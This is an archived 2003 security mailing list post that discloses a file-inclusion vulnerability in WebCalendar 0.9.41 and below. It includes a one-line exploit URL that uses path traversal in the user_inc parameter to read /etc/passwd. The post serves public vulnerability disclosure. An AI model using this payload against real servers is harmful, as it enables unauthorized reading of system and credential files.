lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20030721012015.GA59895@ak.texas-shooters.com> Date: Sun, 20 Jul 2003 20:20:15 -0500 From: noconflic <nocon@...as-shooters.com> To: full-disclosure@...ts.netsys.com Cc: bugtraq@...urityfocus.com Subject: WebCalendar Include File Webcalendar 0.9.41 and below. http://webcalendar.sourceforge.net/ Since this appears to be public info now. Problem: http://sourceforge.net/forum/forum.php?thread_id=901234&forum_id=11588 Exploit: http://www.some.host/webcalendar/[filename].php?user_inc=../../../../../etc/passwd - nocon http://nocon.darkflame.net/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html